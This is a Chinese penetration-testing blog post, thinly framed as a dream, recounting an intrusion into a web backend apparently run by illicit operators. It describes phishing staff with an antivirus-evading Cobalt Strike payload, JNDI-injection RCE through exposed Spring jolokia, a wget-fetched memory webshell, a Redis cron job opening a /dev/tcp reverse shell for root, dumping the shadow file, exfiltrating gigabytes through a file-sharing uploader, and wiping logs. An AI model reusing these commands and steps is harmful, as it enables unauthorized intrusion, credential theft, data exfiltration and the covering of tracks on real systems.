重生之我是赏金猎人-SRC漏洞挖掘(十三)-攻防对抗/梦中绝杀X脖代理商

0x00 前言

前两天在国企实验室的朋友遇到了一个棘手的目标,听说之前没人能打点进去,只能靠xxxxx取证

我一听来了兴趣,在梦中臆造了一个靶场进行渗透,并且已获得相关授权

还请各位看官请勿对号入座,如有雷同,纯属巧合

0x01 打点

官网发现了客服联系方式

为了过审,没法放图…

通过修改 shellcode特征的CS + AntiAV加载器,直接做出免杀🐴。

改后缀名为非exe(懂的都懂),直接用钓客服(现在客服都聪明了,直接exe是肯定钓不到的),获得其桌面记事本

记事本中翻出来了backend地址,但是并没有账号密码(有也没有用,因为有Google验证码)

http://xxxxx/xxxxx-admin/

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4cLdCrux-1676520445188)(https://tva1.sinaimg.cn/large/e6c9d24egy1h0bjgznshqj21k20u0gox.jpg)]

0x02 FUZZ得到Spring Actuator泄露,并分析信息

FUZZ了一下,出了二级目录Spring Actuator的泄露

http://xxxxx/xxxxx-admin/actuator/

发现了老朋友jolokia

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EJ3bQ12D-1676520445189)(https://tva1.sinaimg.cn/large/e6c9d24egy1h09sumhj2jj20u00uatcc.jpg)]

jolokia组件,熟悉Spring测试的兄弟都知道,不出意外可以直接秒~

又访问了几个常见的端点

http://xxxxx/xxxxx-admin/actuator/env

通过env端点可知,该后台托管在亚马逊云,并且没有泄露ak,sk等信息

翻来覆去,只看到有个redis的密码

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-0vplrNdz-1676520445189)(https://tva1.sinaimg.cn/large/e6c9d24egy1h0bli7t6zvj21280hytai.jpg)]

看了下beans端点,并没有找到能用来直接dump出星号密码的合适Mbean,所以放弃直接通过jolokia调用mbean获取明文

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-90j6Wxu1-1676520445189)(https://tva1.sinaimg.cn/large/e6c9d24egy1h0bli5hd9sj21qm0u0aee.jpg)]

http://xxxxx/xxxxx-admin/actuator/heapdump

通过下载heapdump,进入Mat分析

select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9guxIKWN-1676520445189)(https://tva1.sinaimg.cn/large/e6c9d24egy1h0bm5vi95zj21810u0dkp.jpg)]

调试后发现redis配置的链接地址是127.0.0.1,密码为空,但是并没有开放端口外链,那只能先留着了

0x03 Jolokia Realm JNDI注入 rce

https://xxxx/xxxxx-admin/actuator/jolokia/

根据得到jolokia端点

直接RCE打试试

利用条件为:

  • 目标网站/jolokia/list 接口存在 type=MBeanFactory 和 createJNDIRealm 关键词
  • 请求可出外网

命令编码地址:http://www.jackson-t.ca/runtime-exec-payloads.html

编码反弹Shell的命令

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MJ0qLhkh-1676520445189)(https://tva1.sinaimg.cn/large/e6c9d24egy1h09sz8igg6j213z0u00xo.jpg)]

用JNDI-Injection-Exploit直接起个恶意Rmi服务

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “command” -A vps_ip

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-TBk9laxm-1676520445190)(https://tva1.sinaimg.cn/large/e6c9d24egy1h0blindt0rj21je0g0q62.jpg)]

直接修改好脚本

https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-realm-jndi-rce.py

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-r9lhVgxl-1676520445190)(https://tva1.sinaimg.cn/large/e6c9d24egy1h09tfoax8kj20u014343k.jpg)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rG6twkjx-1676520445190)(https://tva1.sinaimg.cn/large/e6c9d24egy1h09u3hjg7nj20ww0e0wgu.jpg)]

运气不错,目标出网,直接秒了

在这里插入图片描述
在这里插入图片描述

www权限

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ONccKt5h-1676520445190)(https://tva1.sinaimg.cn/large/e6c9d24egy1h0blvjcg77j20gq0bimxe.jpg)]
如有技术交流或渗透测试/代码审计/红队方向培训/红蓝对抗评估需求的朋友

欢迎联系QQ/VX-547006660

0x04反弹shell后的取证

history,last、hosts,中间件日志等常规取证就不说了

目标的运维还是比较谨慎的,没有直连,而是以一台亚马逊云的主机为跳板进行SSH链接

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DFC3aLgN-1676520445191)(https://tva1.sinaimg.cn/large/e6c9d24egy1h0bm3vc4pgj210i0k6aeq.jpg)]

进程看了一下,web程序用的是MVC架构

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-wOoUixWK-1676520445191)(https://tva1.sinaimg.cn/large/e6c9d24egy1h0bm51wmbmj21h809kmyz.jpg)]

0x05 注入内存🐴

为了防止反弹的Shell随时GG,所以选择注个内存马到Tomcat

比较恶心的是目标用的MVC架构,路由默认都是直接302跳转后台的路由,导致不少内存马没法直接用,时间紧急,去Git翻了一个

https://github.com/WisteriaTiger/JundeadShell

直接受控机梭哈

wget x.x.x.x:50000/agent_starter.jar

nohup java -jar agent_starter.jar "java_process_name" 8 &

挂上Burp访问靶标,找到了个不302跳转的接口,加上密码,访问内存马成功

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-z2qst9zU-1676520445191)(https://tva1.sinaimg.cn/large/e6c9d24egy1h0bmfv7il5j21gw0hcabg.jpg)]

0x06 借用redis权限提升

目标为www权限,而且用的亚马逊云,及时打了补丁,最近的番号pkexec,dirty pipe等测试后不好使,脏牛等老古董更不行

GUID,SUID查了一遍,没有误配

最后都快放弃的时候看了一眼进程,redis是以root权限运行的…天助我也

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-AwHDzno3-1676520445191)(https://tva1.sinaimg.cn/large/e6c9d24ely1h0bpl0idy9j21fw0b8acv.jpg)]

直接通过端口转发程序把redis的端口转发到本地

利用redis写计划任务

(PS:Ubuntu下会因为夹杂了脏数据导致语法无法识别而任务失效;但对于centos系统则没有影响,可以成功被利用,靶标为centos)

echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/xx.xx.xx.xx/4444 0>&1\n\n"|redis-cli -h xx.xx.xx.xx -x set 1 #设定值
redis-cli -h xx.xx.xx.xx config set dir /var/spool/cron/
redis-cli -h xx.xx.xx.xx config set dbfilename root
redis-cli -h xx.xx.xx.xx save

nc监听本地,没过一会,root权限的shell就弹回来了

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-TlkAx1jN-1676520445191)(https://tva1.sinaimg.cn/large/e6c9d24ely1h0boty1re6j20ji0lcaap.jpg)]

随后又把shadow导出,取证了root用户目录下的部分东西,做了部分权限维持

0x07 文件取证资料回传

把取证好的网站Jar包,目录日志,登陆日志打包好,足足有几个G,回传文件成了难事

tar -cvf xxxx.tar *

尝试了nc,后门回传等均不稳定中途回传断掉,自己的oss那时候也过期了,没法通过oss回传,难受的一逼…

最终问了下小圈里的师傅,提供了一个好用的思路

利用奶牛快传回传文件

https://github.com/Mikubill/cowtransfer-uploader

nohup ./cowtransfer-uploader -c "remember-mev2=...;" -a "<cow-auth-token>" xxx.tar

速度很舒服,大概上传速度能到每秒6M

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CEuP2Inw-1676520445191)(https://tva1.sinaimg.cn/large/e6c9d24ely1h1typvfmjtj21hk0ridop.jpg)]

随后直接去自己的奶牛快传下载即可

0x08 资料分析

把回传回来的jar包反编译,取证其中的数据库链接信息,等待下步指示

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ONx90S1t-1676520445192)(https://tva1.sinaimg.cn/large/e6c9d24ely1h0brjglj2nj21dr0u0whx.jpg)]

分析程序记录的Log日志,登陆信息、账号、登陆IP尽收眼底;站在暗处的xx分子命不久矣

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gsSl12uo-1676520445192)(https://tva1.sinaimg.cn/large/e6c9d24ely1h0brn9qnkfj21i40683zh.jpg)]

0x09 擦屁股与后言

随后把web当日日志,history,/var/log下的日志全部清理干净

用到的工具全部wipe删掉

断掉shell链接的一瞬间,我醒了,发现这一切竟是我在做梦

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

J0o1ey

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值